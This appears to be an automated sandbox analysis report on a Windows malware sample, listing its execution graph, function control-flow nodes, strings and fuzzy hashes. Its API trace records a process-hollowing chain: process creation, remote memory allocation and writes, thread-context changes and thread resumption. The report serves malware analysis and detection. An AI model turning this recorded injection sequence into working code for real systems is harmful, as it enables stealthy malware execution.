                                        execution_graph 47499 1837dd0 FindCloseChangeNotification 47500 1837e37 47499->47500 47556 1834f20 47557 18350ab 47556->47557 47559 1834f46 47556->47559 47559->47557 47560 1833044 47559->47560 47561 18351a0 PostMessageW 47560->47561 47562 183520c 47561->47562 47562->47559 47563 14d4668 47564 14d467a 47563->47564 47565 14d4686 47564->47565 47569 14d4779 47564->47569 47574 14d4218 47565->47574 47567 14d46a5 47570 14d479d 47569->47570 47578 14d4878 47570->47578 47582 14d4888 47570->47582 47575 14d4223 47574->47575 47590 14d5c6c 47575->47590 47577 14d7048 47577->47567 47580 14d4882 47578->47580 47579 14d498c 47580->47579 47586 14d44e0 47580->47586 47584 14d48af 47582->47584 47583 14d498c 47583->47583 47584->47583 47585 14d44e0 CreateActCtxA 47584->47585 47585->47583 47587 14d5918 CreateActCtxA 47586->47587 47589 14d59db 47587->47589 47589->47589 47591 14d5c77 47590->47591 47594 14d5c8c 47591->47594 47593 14d70ed 47593->47577 47595 14d5c97 47594->47595 47598 14d5cbc 47595->47598 47597 14d71c2 47597->47593 47599 14d5cc7 47598->47599 47600 14d5cec 2 API calls 47599->47600 47601 14d72c5 47600->47601 47601->47597 47834 14dd438 47835 14dd47e GetCurrentProcess 47834->47835 47837 14dd4c9 47835->47837 47838 14dd4d0 GetCurrentThread 47835->47838 47837->47838 47839 14dd50d GetCurrentProcess 47838->47839 47841 14dd506 47838->47841 47840 14dd543 47839->47840 47842 14dd56b GetCurrentThreadId 47840->47842 47841->47839 47843 14dd59c 47842->47843 47602 18324aa 47603 1832484 47602->47603 47604 1832494 47602->47604 47608 1833ca1 47603->47608 47613 1833d0e 47603->47613 47619 1833cb0 47603->47619 47609 1833cb0 47608->47609 47624 1833fd1 47609->47624 47645 1834010 47609->47645 47610 1833cee 47610->47604 47614 1833c9c 47613->47614 47616 1833d11 47613->47616 47617 1833fd1 14 API calls 47614->47617 47618 1834010 14 API calls 47614->47618 47615 1833cee 47615->47604 47616->47604 47617->47615 47618->47615 47620 1833cca 47619->47620 47622 1833fd1 14 API calls 47620->47622 47623 1834010 14 API calls 47620->47623 47621 1833cee 47621->47604 47622->47621 47623->47621 47625 1833f75 47624->47625 47626 1833fef 47624->47626 47625->47610 47626->47625 47666 1834683 47626->47666 47674 18345ff 47626->47674 47678 18341bf 47626->47678 47683 1834839 47626->47683 47692 183415a 47626->47692 47696 1834ad6 47626->47696 47701 18343d6 47626->47701 47706 18342d6 47626->47706 47712 18347ac 47626->47712 47720 183422d 47626->47720 47724 183482e 47626->47724 47732 1834288 47626->47732 47740 1834426 47626->47740 47745 18345e1 47626->47745 47750 1834461 47626->47750 47759 1834402 47626->47759 47768 1834943 47626->47768 47773 18342e3 47626->47773 47646 1834025 47645->47646 47647 1834037 47646->47647 47648 1834683 4 API calls 47646->47648 47649 18342e3 2 API calls 47646->47649 47650 1834943 3 API calls 47646->47650 47651 1834402 4 API calls 47646->47651 47652 1834461 4 API calls 47646->47652 47653 18345e1 3 API calls 47646->47653 47654 1834426 4 API calls 47646->47654 47655 1834288 4 API calls 47646->47655 47656 183482e 4 API calls 47646->47656 47657 183422d 3 API calls 47646->47657 47658 18347ac 4 API calls 47646->47658 47659 18342d6 3 API calls 47646->47659 47660 18343d6 2 API calls 47646->47660 47661 1834ad6 2 API calls 47646->47661 47662 183415a 2 API calls 47646->47662 47663 1834839 4 API calls 47646->47663 47664 18341bf 2 API calls 47646->47664 47665 18345ff 3 API calls 47646->47665 47647->47610 47648->47647 47649->47647 47650->47647 47651->47647 47652->47647 47653->47647 47654->47647 47655->47647 47656->47647 47657->47647 47658->47647 47659->47647 47660->47647 47661->47647 47662->47647 47663->47647 47664->47647 47665->47647 47667 1834689 47666->47667 47785 18315b0 47667->47785 47790 18315b8 47667->47790 47668 18341c7 47668->47625 47669 18341b5 47669->47668 47777 1831660 47669->47777 47781 1831668 47669->47781 47794 1831c30 47674->47794 47801 1831c38 47674->47801 47675 183462d 47675->47625 47679 18341b5 47678->47679 47680 18341c7 47679->47680 47681 1831660 Wow64SetThreadContext 47679->47681 47682 1831668 Wow64SetThreadContext 47679->47682 47680->47625 47681->47679 47682->47679 47684 1834843 47683->47684 47685 18347ce 47683->47685 47686 18341b5 47685->47686 47688 18315b0 ResumeThread 47685->47688 47689 18315b8 ResumeThread 47685->47689 47687 18341c7 47686->47687 47690 1831660 Wow64SetThreadContext 47686->47690 47691 1831668 Wow64SetThreadContext 47686->47691 47687->47625 47688->47686 47689->47686 47690->47686 47691->47686 47805 1831ec0 47692->47805 47809 1831eb5 47692->47809 47697 18341b5 47696->47697 47698 18341c7 47697->47698 47699 1831660 Wow64SetThreadContext 47697->47699 47700 1831668 Wow64SetThreadContext 47697->47700 47698->47625 47699->47697 47700->47697 47702 18341b5 47701->47702 47702->47701 47703 18341c7 47702->47703 47704 1831660 Wow64SetThreadContext 47702->47704 47705 1831668 Wow64SetThreadContext 47702->47705 47703->47625 47704->47702 47705->47702 47707 1834711 47706->47707 47813 1831d21 47707->47813 47817 1831d28 47707->47817 47821 1831e00 47707->47821 47708 1834733 47708->47625 47713 18347b4 47712->47713 47716 18315b0 ResumeThread 47713->47716 47717 18315b8 ResumeThread 47713->47717 47714 18341c7 47714->47625 47715 18341b5 47715->47714 47718 1831660 Wow64SetThreadContext 47715->47718 47719 1831668 Wow64SetThreadContext 47715->47719 47716->47715 47717->47715 47718->47715 47719->47715 47722 1831c30 2 API calls 47720->47722 47723 1831c38 WriteProcessMemory 47720->47723 47721 183425e 47721->47625 47722->47721 47723->47721 47725 18347cc 47724->47725 47728 18315b0 ResumeThread 47725->47728 47729 18315b8 ResumeThread 47725->47729 47726 18341b5 47727 18341c7 47726->47727 47730 1831660 Wow64SetThreadContext 47726->47730 47731 1831668 Wow64SetThreadContext 47726->47731 47727->47625 47728->47726 47729->47726 47730->47726 47731->47726 47733 18342a3 47732->47733 47738 18315b0 ResumeThread 47733->47738 47739 18315b8 ResumeThread 47733->47739 47734 18341c7 47734->47625 47735 18341b5 47735->47734 47736 1831660 Wow64SetThreadContext 47735->47736 47737 1831668 Wow64SetThreadContext 47735->47737 47736->47735 47737->47735 47738->47735 47739->47735 47743 1831c30 2 API calls 47740->47743 47826 1831b78 47740->47826 47830 1831b70 47740->47830 47741 1834447 47741->47625 47743->47741 47746 18345f8 47745->47746 47748 1831c30 2 API calls 47746->47748 47749 1831c38 WriteProcessMemory 47746->47749 47747 183497f 47748->47747 47749->47747 47751 1834464 47750->47751 47752 18342a3 47750->47752 47751->47625 47752->47625 47755 18315b0 ResumeThread 47752->47755 47756 18315b8 ResumeThread 47752->47756 47753 18341c7 47753->47625 47754 18341b5 47754->47753 47757 1831660 Wow64SetThreadContext 47754->47757 47758 1831668 Wow64SetThreadContext 47754->47758 47755->47754 47756->47754 47757->47754 47758->47754 47761 1834407 47759->47761 47760 18345d2 47760->47625 47761->47760 47764 18315b0 ResumeThread 47761->47764 47765 18315b8 ResumeThread 47761->47765 47762 18341c7 47762->47625 47763 18341b5 47763->47762 47766 1831660 Wow64SetThreadContext 47763->47766 47767 1831668 Wow64SetThreadContext 47763->47767 47764->47763 47765->47763 47766->47763 47767->47763 47769 183495e 47768->47769 47771 1831c30 2 API calls 47769->47771 47772 1831c38 WriteProcessMemory 47769->47772 47770 183497f 47771->47770 47772->47770 47775 1831660 Wow64SetThreadContext 47773->47775 47776 1831668 Wow64SetThreadContext 47773->47776 47774 1834302 47774->47625 47775->47774 47776->47774 47778 1831668 Wow64SetThreadContext 47777->47778 47780 18316f5 47778->47780 47780->47669 47782 18316ad Wow64SetThreadContext 47781->47782 47784 18316f5 47782->47784 47784->47669 47786 1831537 47785->47786 47787 18315b7 ResumeThread 47785->47787 47786->47669 47789 1831629 47787->47789 47789->47669 47791 18315f8 ResumeThread 47790->47791 47793 1831629 47791->47793 47793->47669 47795 1831c37 WriteProcessMemory 47794->47795 47796 1831b44 VirtualAllocEx 47794->47796 47800 1831cd7 47795->47800 47798 1831bf5 47796->47798 47798->47675 47800->47675 47802 1831c80 WriteProcessMemory 47801->47802 47804 1831cd7 47802->47804 47804->47675 47806 1831f49 CreateProcessA 47805->47806 47808 183210b 47806->47808 47810 1831f49 47809->47810 47810->47810 47811 18320ae CreateProcessA 47810->47811 47812 183210b 47811->47812 47814 1831d28 ReadProcessMemory 47813->47814 47816 1831db7 47814->47816 47816->47708 47818 1831d73 ReadProcessMemory 47817->47818 47820 1831db7 47818->47820 47820->47708 47822 1831d87 47821->47822 47823 1831d98 ReadProcessMemory 47822->47823 47825 1831e07 47822->47825 47824 1831db7 47823->47824 47824->47708 47825->47708 47827 1831bb8 VirtualAllocEx 47826->47827 47829 1831bf5 47827->47829 47829->47741 47831 1831b78 VirtualAllocEx 47830->47831 47833 1831bf5 47831->47833 47833->47741 47433 14dff40 47436 14d5cec 47433->47436 47435 14dff6e 47438 14d5cf7 47436->47438 47437 14d8609 47437->47435 47438->47437 47440 14dcd60 47438->47440 47442 14dcd65 47440->47442 47441 14dcdb5 47441->47437 47442->47441 47445 14dcf10 47442->47445 47449 14dcf20 47442->47449 47447 14dcf2d 47445->47447 47446 14dcf67 47446->47441 47447->47446 47453 14db780 47447->47453 47451 14dcf2d 47449->47451 47450 14dcf67 47450->47441 47451->47450 47452 14db780 2 API calls 47451->47452 47452->47450 47454 14db78b 47453->47454 47456 14ddc78 47454->47456 47457 14dd084 47454->47457 47456->47456 47458 14dd08f 47457->47458 47459 14d5cec 2 API calls 47458->47459 47460 14ddce7 47459->47460 47464 14dfa50 47460->47464 47469 14dfa68 47460->47469 47461 14ddd21 47461->47456 47465 14dfa99 47464->47465 47468 14dfaa5 47464->47468 47465->47468 47474 32809c0 47465->47474 47478 32809b2 47465->47478 47468->47461 47470 14dfa99 47469->47470 47471 14dfaa5 47469->47471 47470->47471 47472 32809c0 2 API calls 47470->47472 47473 32809b2 2 API calls 47470->47473 47471->47461 47472->47471 47473->47471 47475 32809eb 47474->47475 47476 3280a9a 47475->47476 47483 3281792 47475->47483 47479 328095c 47478->47479 47480 32809be 47478->47480 47479->47468 47481 3280a9a 47480->47481 47482 3281792 2 API calls 47480->47482 47482->47481 47484 328173e 47483->47484 47485 32817b3 47483->47485 47484->47476 47485->47484 47485->47485 47489 32818e5 47485->47489 47493 32818f0 47485->47493 47490 32818f0 CreateWindowExW 47489->47490 47492 3281a14 47490->47492 47494 3281958 CreateWindowExW 47493->47494 47496 3281a14 47494->47496 47497 14dd680 DuplicateHandle 47498 14dd716 47497->47498 47844 14dacb0 47847 14dada8 47844->47847 47845 14dacbf 47848 14dadb9 47847->47848 47849 14daddc 47847->47849 47848->47849 47855 14db031 47848->47855 47859 14db040 47848->47859 47849->47845 47850 14dadd4 47850->47849 47851 14dafe0 GetModuleHandleW 47850->47851 47852 14db00d 47851->47852 47852->47845 47856 14db054 47855->47856 47858 14db079 47856->47858 47863 14da168 47856->47863 47858->47850 47860 14db054 47859->47860 47861 14da168 LoadLibraryExW 47860->47861 47862 14db079 47860->47862 47861->47862 47862->47850 47864 14db220 LoadLibraryExW 47863->47864 47866 14db299 47864->47866 47866->47858 47501 143d01c 47502 143d034 47501->47502 47503 143d08e 47502->47503 47508 3281aa8 47502->47508 47513 3282818 47502->47513 47518 3282808 47502->47518 47523 3281a98 47502->47523 47509 3281ace 47508->47509 47511 3282808 2 API calls 47509->47511 47512 3282818 2 API calls 47509->47512 47510 3281aef 47510->47503 47511->47510 47512->47510 47514 3282845 47513->47514 47515 3282877 47514->47515 47528 3282da8 47514->47528 47533 3282d88 47514->47533 47519 3282845 47518->47519 47520 3282877 47519->47520 47521 3282da8 2 API calls 47519->47521 47522 3282d88 2 API calls 47519->47522 47521->47520 47522->47520 47524 3281aa8 47523->47524 47526 3282808 2 API calls 47524->47526 47527 3282818 2 API calls 47524->47527 47525 3281aef 47525->47503 47526->47525 47527->47525 47530 3282dbc 47528->47530 47529 3282e48 47529->47515 47538 3282e60 47530->47538 47541 3282e50 47530->47541 47535 3282dbc 47533->47535 47534 3282e48 47534->47515 47536 3282e60 2 API calls 47535->47536 47537 3282e50 2 API calls 47535->47537 47536->47534 47537->47534 47539 3282e71 47538->47539 47544 3284030 47538->47544 47539->47529 47542 3284030 2 API calls 47541->47542 47543 3282e71 47541->47543 47542->47543 47543->47529 47548 3284040 47544->47548 47552 3284050 47544->47552 47545 328403a 47545->47539 47549 3284092 47548->47549 47551 3284099 47548->47551 47550 32840ea CallWindowProcW 47549->47550 47549->47551 47550->47551 47551->47545 47553 3284092 47552->47553 47555 3284099 47552->47555 47554 32840ea CallWindowProcW 47553->47554 47553->47555 47554->47555 47555->47545

                                        Executed Functions

                                        Function 07F73D50 Relevance: 9.0, Strings: 7, Instructions: 280COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 294 7f73d50-7f73d79 377 7f73d79 call 7f74182 294->377 378 7f73d79 call 7f74190 294->378 296 7f73d7f-7f73dda call 7f739ec 305 7f73ddd-7f73df2 296->305 307 7f73df4 305->307 308 7f73df9-7f73e0e 307->308 309 7f73e10 308->309 310 7f73e59-7f73ea5 308->310 309->307 309->310 311 7f73e17-7f73e19 309->311 312 7f74130-7f74137 309->312 313 7f73e3f-7f73e41 309->313 314 7f73f3e 309->314 315 7f73f7c-7f73fcd 309->315 316 7f7409b-7f74111 309->316 317 7f73ea7 309->317 318 7f73f05 309->318 319 7f73e22-7f73e3d 309->319 320 7f74062-7f74065 309->320 321 7f73ee0 309->321 322 7f73f4c 309->322 323 7f73eca-7f73ede 309->323 324 7f73f28-7f73f3c 309->324 310->317 310->321 311->305 326 7f73e1b-7f73e20 311->326 327 7f73e43-7f73e48 313->327 328 7f73e4a 313->328 314->322 357 7f73fe5-7f74037 315->357 358 7f73fcf-7f73fd5 315->358 393 7f74113 call 7f78c61 316->393 394 7f74113 call 7f78c78 316->394 331 7f73eac-7f73ec1 317->331 325 7f73f0a-7f73f1f 318->325 319->308 375 7f74068 call 7f76448 320->375 376 7f74068 call 7f76438 320->376 321->318 330 7f73f51-7f73f66 322->330 323->331 324->325 325->314 334 7f73f21 325->334 326->308 337 7f73e4f-7f73e57 327->337 328->337 330->312 339 7f73f6c 330->339 331->321 340 7f73ec3 331->340 334->312 334->314 334->315 334->316 334->318 334->320 334->322 334->324 337->308 338 7f7406e-7f74075 379 7f7407a call 7f78120 338->379 380 7f7407a call 7f77260 338->380 381 7f7407a call 7f772ac 338->381 382 7f7407a call 7f7728c 338->382 383 7f7407a call 7f7726c 338->383 384 7f7407a call 7f78169 338->384 385 7f7407a call 7f780d8 338->385 386 7f7407a call 7f77f28 338->386 387 7f7407a call 7f77f18 338->387 339->312 339->315 339->316 339->320 339->322 343 7f73f7b 339->343 340->312 340->314 340->315 340->316 340->317 340->318 340->320 340->321 340->322 340->323 340->324 343->315 346 7f74080 388 7f74082 call 7f782b1 346->388 389 7f74082 call 7f772f0 346->389 390 7f74082 call 7f7877b 346->390 391 7f74082 call 7f782ba 346->391 392 7f74082 call 7f78788 346->392 350 7f74088-7f74096 350->330 371 7f7404f-7f7405d 357->371 372 7f74039-7f7403f 357->372 359 7f73fd7 358->359 360 7f73fd9-7f73fdb 358->360 359->357 360->357 367 7f74119 369 7f74120-7f7412b 367->369 369->330 371->330 373 7f74043-7f74045 372->373 374 7f74041 372->374 373->371 374->371 375->338 376->338 377->296 378->296 379->346 380->346 381->346 382->346 383->346 384->346 385->346 386->346 387->346 388->350 389->350 390->350 391->350 392->350 393->367 394->367
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !Y3E$Te]q$Te]q$$]q$$]q$$]q$$]q
                                        • API String ID: 0-1582036792
                                        • Opcode ID: 14557b8a223ab91c13bc29e4cf6f8d0b7c15288c5f26477d12ea7a6772b72576
                                        • Instruction ID: 63e2b1bb3ee145fdf35b3e43f65c6ba1a3a9fa79333be6f370ac68e3e7c9547d
                                        • Opcode Fuzzy Hash: 14557b8a223ab91c13bc29e4cf6f8d0b7c15288c5f26477d12ea7a6772b72576
                                        • Instruction Fuzzy Hash: 1DA18C74B502499FDB089F69C995B6E7AF3BF88700F25846AE806DB3A4DE74DC01CB41
                                        Function 07F73D42 Relevance: 5.3, Strings: 4, Instructions: 276COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 440 7f73d42-7f73d79 530 7f73d79 call 7f74182 440->530 531 7f73d79 call 7f74190 440->531 442 7f73d7f-7f73dda call 7f739ec 451 7f73ddd-7f73df2 442->451 453 7f73df4 451->453 454 7f73df9-7f73e0e 453->454 455 7f73e10 454->455 456 7f73e59-7f73ea5 454->456 455->453 455->456 457 7f73e17-7f73e19 455->457 458 7f74130-7f74137 455->458 459 7f73e3f-7f73e41 455->459 460 7f73f3e 455->460 461 7f73f7c-7f73fcd 455->461 462 7f7409b-7f74111 455->462 463 7f73ea7 455->463 464 7f73f05 455->464 465 7f73e22-7f73e3d 455->465 466 7f74062-7f74065 455->466 467 7f73ee0 455->467 468 7f73f4c 455->468 469 7f73eca-7f73ede 455->469 470 7f73f28-7f73f3c 455->470 456->463 456->467 457->451 472 7f73e1b-7f73e20 457->472 473 7f73e43-7f73e48 459->473 474 7f73e4a 459->474 460->468 503 7f73fe5-7f74037 461->503 504 7f73fcf-7f73fd5 461->504 526 7f74113 call 7f78c61 462->526 527 7f74113 call 7f78c78 462->527 477 7f73eac-7f73ec1 463->477 471 7f73f0a-7f73f1f 464->471 465->454 528 7f74068 call 7f76448 466->528 529 7f74068 call 7f76438 466->529 467->464 476 7f73f51-7f73f66 468->476 469->477 470->471 471->460 480 7f73f21 471->480 472->454 483 7f73e4f-7f73e57 473->483 474->483 476->458 485 7f73f6c 476->485 477->467 486 7f73ec3 477->486 480->458 480->460 480->461 480->462 480->464 480->466 480->468 480->470 483->454 484 7f7406e-7f74075 532 7f7407a call 7f78120 484->532 533 7f7407a call 7f77260 484->533 534 7f7407a call 7f772ac 484->534 535 7f7407a call 7f7728c 484->535 536 7f7407a call 7f7726c 484->536 537 7f7407a call 7f78169 484->537 538 7f7407a call 7f780d8 484->538 539 7f7407a call 7f77f28 484->539 540 7f7407a call 7f77f18 484->540 485->458 485->461 485->462 485->466 485->468 489 7f73f7b 485->489 486->458 486->460 486->461 486->462 486->463 486->464 486->466 486->467 486->468 486->469 486->470 489->461 492 7f74080 521 7f74082 call 7f782b1 492->521 522 7f74082 call 7f772f0 492->522 523 7f74082 call 7f7877b 492->523 524 7f74082 call 7f782ba 492->524 525 7f74082 call 7f78788 492->525 496 7f74088-7f74096 496->476 517 7f7404f-7f7405d 503->517 518 7f74039-7f7403f 503->518 505 7f73fd7 504->505 506 7f73fd9-7f73fdb 504->506 505->503 506->503 513 7f74119 515 7f74120-7f7412b 513->515 515->476 517->476 519 7f74043-7f74045 518->519 520 7f74041 518->520 519->517 520->517 521->496 522->496 523->496 524->496 525->496 526->513 527->513 528->484 529->484 530->442 531->442 532->492 533->492 534->492 535->492 536->492 537->492 538->492 539->492 540->492
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q$$]q$$]q
                                        • API String ID: 0-3083981010
                                        • Opcode ID: 447d1debd7c95f7252baba12e211ea763bf2940f55149ffea537e2c73339b9dd
                                        • Instruction ID: c76b9365e673abee660c8e11b33d759be347a96c9375c14e410f9dcde63d2056
                                        • Opcode Fuzzy Hash: 447d1debd7c95f7252baba12e211ea763bf2940f55149ffea537e2c73339b9dd
                                        • Instruction Fuzzy Hash: 63A19C74B502499FDB089F79C995B6E7AF2BF88700F25846AE806DB3A4DE74DC01CB41
                                        Function 01831C30 Relevance: 3.1, APIs: 2, Instructions: 108memoryinjectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 638 1831c30-1831c35 639 1831bb7 638->639 640 1831c37-1831c86 638->640 641 1831b44 639->641 642 1831bb9-1831bf3 VirtualAllocEx 639->642 645 1831c96-1831cd5 WriteProcessMemory 640->645 646 1831c88-1831c94 640->646 641->639 647 1831bf5-1831bfb 642->647 648 1831bfc-1831c21 642->648 652 1831cd7-1831cdd 645->652 653 1831cde-1831d0e 645->653 646->645 647->648 652->653
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01831BE6
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01831CC8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocMemoryProcessVirtualWrite
                                        • String ID:
                                        • API String ID: 645232735-0
                                        • Opcode ID: 6971b823cf2ee294913d01e5daada33d17c1682a621a5858b30e1ad314f8dc8f
                                        • Instruction ID: d2c786ecd1b13940c88f45110b19ce963fd24885df17d9b9d2e3f8a1ab44aa01
                                        • Opcode Fuzzy Hash: 6971b823cf2ee294913d01e5daada33d17c1682a621a5858b30e1ad314f8dc8f
                                        • Instruction Fuzzy Hash: 694188B29002098FDF14DFA9C844BEEBFF1FF88310F148429E619A7250D7799955CBA0
                                        Function 07F73EE3 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 658 7f73ee3-7f73f03 660 7f73f05 658->660 661 7f73f3e 658->661 662 7f73f0a-7f73f1f 660->662 663 7f73f4c 661->663 662->661 664 7f73f21 662->664 665 7f73f51-7f73f66 663->665 664->660 664->661 664->663 666 7f74062-7f74065 664->666 667 7f74130-7f74137 664->667 668 7f73f7c-7f73fcd 664->668 669 7f7409b-7f74111 664->669 670 7f73f28-7f73f3c 664->670 665->667 671 7f73f6c 665->671 705 7f74068 call 7f76448 666->705 706 7f74068 call 7f76438 666->706 687 7f73fe5-7f74037 668->687 688 7f73fcf-7f73fd5 668->688 721 7f74113 call 7f78c61 669->721 722 7f74113 call 7f78c78 669->722 670->662 671->663 671->666 671->667 671->668 671->669 672 7f73f7b 671->672 672->668 674 7f7406e-7f74075 712 7f7407a call 7f78120 674->712 713 7f7407a call 7f77260 674->713 714 7f7407a call 7f772ac 674->714 715 7f7407a call 7f7728c 674->715 716 7f7407a call 7f7726c 674->716 717 7f7407a call 7f78169 674->717 718 7f7407a call 7f780d8 674->718 719 7f7407a call 7f77f28 674->719 720 7f7407a call 7f77f18 674->720 679 7f74080 707 7f74082 call 7f782b1 679->707 708 7f74082 call 7f772f0 679->708 709 7f74082 call 7f7877b 679->709 710 7f74082 call 7f782ba 679->710 711 7f74082 call 7f78788 679->711 682 7f74088-7f74096 682->665 701 7f7404f-7f7405d 687->701 702 7f74039-7f7403f 687->702 689 7f73fd7 688->689 690 7f73fd9-7f73fdb 688->690 689->687 690->687 697 7f74119 699 7f74120-7f7412b 697->699 699->665 701->665 703 7f74043-7f74045 702->703 704 7f74041 702->704 703->701 704->701 705->674 706->674 707->682 708->682 709->682 710->682 711->682 712->679 713->679 714->679 715->679 716->679 717->679 718->679 719->679 720->679 721->697 722->697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 09621aaee9fb22fe6266f23eaae56e63d8e291037058bd336f943ff12b19e6c6
                                        • Instruction ID: 414d600f5a39651a9a8d16b489c3857d93de37e75495100c0c0465e5a29904e9
                                        • Opcode Fuzzy Hash: 09621aaee9fb22fe6266f23eaae56e63d8e291037058bd336f943ff12b19e6c6
                                        • Instruction Fuzzy Hash: 6D519F74B402099FDB189F75D955BAE7AB3BF88700F24846AE8069B394CE75DC01CB51
                                        Function 07F772F0 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 723 7f772f0-7f782c8 726 7f782d1-7f78321 723->726 727 7f782ca-7f782d0 723->727 734 7f788c4-7f788c7 726->734 735 7f787ad 726->735 740 7f788b2 734->740 741 7f788c8 734->741 736 7f787b2-7f787c7 735->736 738 7f788cd-7f78904 736->738 739 7f787cd 736->739 739->735 739->738 742 7f788b7-7f788ba 739->742 743 7f78866-7f7887c call 7f7727c 739->743 744 7f787d4-7f787eb call 7f7726c 739->744 745 7f78892-7f788ad 739->745 746 7f78881-7f7888d 739->746 747 7f7884f-7f78861 739->747 748 7f787ed-7f787fa 739->748 749 7f787fc-7f78806 739->749 750 7f7883a-7f7883c 739->750 751 7f78808-7f78810 739->751 740->736 741->736 757 7f788c3 742->757 758 7f788bc-7f788c1 742->758 743->736 744->736 745->740 746->736 747->736 748->736 749->736 752 7f78845 750->752 753 7f7883e-7f78843 750->753 766 7f78817-7f78835 751->766 759 7f7884a 752->759 753->759 757->734 758->741 759->736 766->736
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq$T(z
                                        • API String ID: 0-1589312872
                                        • Opcode ID: f2a6fbd1dfb9b449db3342e8dc77cf36f19956b1e01f18a655185221549d0cfc
                                        • Instruction ID: d8c2c6ec38e793094900dad6288ce63043019ae27dab886e823fca83dc9bf3d6
                                        • Opcode Fuzzy Hash: f2a6fbd1dfb9b449db3342e8dc77cf36f19956b1e01f18a655185221549d0cfc
                                        • Instruction Fuzzy Hash: 9A411971F25205CBDB08DFB489556AE7BB6FBC5640F18886BD502AF294CA30CD46C751
                                        Function 07F7877B Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        • Opcode ID: ffa601e0789a1e63c81a56162817c2685a50382b1c4a012bf6702c531fd8652c
                                        • Instruction ID: 2ce936f03c00b48d0b04f3cbef864c054ee40434be49e8564db1d2442a6323b9
                                        • Opcode Fuzzy Hash: ffa601e0789a1e63c81a56162817c2685a50382b1c4a012bf6702c531fd8652c
                                        • Instruction Fuzzy Hash: A7411872F24205CBDB088FB589556AFB6B7FBC9640F18842BD502BF294CA30C942C751
                                        Function 07F78788 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        • Opcode ID: 1811641ac44d577f53fd451d0a855fb6d722fba83383047291c7df94531b1ec8
                                        • Instruction ID: f5739f3e6cdfd71d662669a4642da2e37d2d11c90af6f31f4889571a40efb068
                                        • Opcode Fuzzy Hash: 1811641ac44d577f53fd451d0a855fb6d722fba83383047291c7df94531b1ec8
                                        • Instruction Fuzzy Hash: 23312B72F24205CBDB088FB589555AFB6B7FBC9640F18842BD502BF294CA30CD42C751
                                        Function 07F782B1 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        • Opcode ID: 5b23ad30731a40d1bee0240eaf90623c5e7ccd661ea995bee680e47127acad6a
                                        • Instruction ID: 2032155769a718b0f918e8d347b538d4ad2101ba471849ae2ae3a920b4115c36
                                        • Opcode Fuzzy Hash: 5b23ad30731a40d1bee0240eaf90623c5e7ccd661ea995bee680e47127acad6a
                                        • Instruction Fuzzy Hash: 5531E7B2F35205CBDB449FB489556AEB6B7FBC9640F188427D513AF294CA30CD42CB52
                                        Function 07F70815 Relevance: .3, Instructions: 270COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
